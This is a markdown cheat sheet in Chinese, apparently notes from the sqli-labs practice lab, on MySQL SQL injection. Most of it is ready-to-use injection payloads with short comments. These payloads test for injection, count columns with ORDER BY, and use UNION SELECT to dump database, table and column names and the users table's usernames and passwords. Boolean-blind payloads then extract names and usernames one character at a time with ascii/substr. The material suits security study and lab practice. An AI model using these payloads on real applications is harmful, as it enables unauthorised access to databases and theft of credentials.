Skip to content

Latest commit

 

History

History
137 lines (77 loc) · 4.01 KB

1.md

File metadata and controls

137 lines (77 loc) · 4.01 KB

1

注释

--+ -- 任意符号 %23 (#ur编码)

判断注入

1' and 1=1 --+ 1' and 1=2 --+

查询字段

1' order by 1 --+ 正常 1' order by 4 --+ 报错 1' order by 3 --+ 正常 字段为3

UNION SELECT 联合查询

-1' union select 1,2,3 --+ 1' and 1=2 union select 1,2,3 --+ 报错2,3

信息收集

version() #Mysql版本 user() #数据库用户名 database() #数据库名 @@datadir() #数据库路径

查询所有数据库

-1' union select 1, 2, group_concat(schema_name) from information_schema.schemata --+

查询当前数据库的所有表名

-1' union select 1, 2, group_concat(table_name) from information_schema.tables where table_schema=database() --+ -1' union select 1, 2, group_concat(table_name) from information_schema.tables where table_schema='security' --+ -1' union select 1, 2, group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+ hex编码 前面加0x

查询users表下的列名

-1' union select 1, 2, group_concat(column_name) from information_schema.columns where table_name='users' --+

查询users表下的列名id,username,password的值

-1' union select 1, 2, group_concat(id,username,password) from users --+

布尔型盲注

1

判断当前数据库名(security)长度

id=1' and length((select database()))>=8 --+

id=1' and length(database())>=8 --+

判断数据库名第一位为ascii(115) = s(字母)

id=1' and ascii(substr(database(),1,1))=115 --+

判断数据库名第二位为ascii(101) = e(字母)

id=1' and ascii(substr(database(),2,1))=101 --+

第三位

id=1' and ascii(substr(database(),3,1))=99 --+

或者

数据库第一位为s

id=1' and left(database(),1)='s' --+

数据库前两位为se

id=1' and left(database(),2)='se' --+

查数据库security的表名

emails,referers,uagents,users

2

查第一张表名的第一个字符101 = e

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101--+

查第一张表名的第二个字符109 = m

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109--+

查第二张表名的第一个字符114 = r

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114--+

查users表的列名

id,username,password

3

查users表的第一个列名的第一个字符 i

id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105--+

查users表的第一个列名的第二个字符 d

id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))=100--+

查users表的第二个列名的第一个字符 u

id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1))=117--+

查数据库security表名users的内容

4

查users表的username的第一字段的第一个字母 D

id=1' and ascii(substr((select username from security.users order by id limit 0,1),1,1))=68--+

查users表的username的第一字段的第二个字母 u

id=1' and ascii(substr((select username from security.users order by id limit 0,1),2,1))=117--+

查users表的username的第二字段的第一个字母 A

id=1' and ascii(substr((select username from security.users order by id limit 1,1),1,1))=65--+

查users表的username的第二字段的第二个字母 n

id=1' and ascii(substr((select username from security.users order by id limit 1,1),2,1))=110--+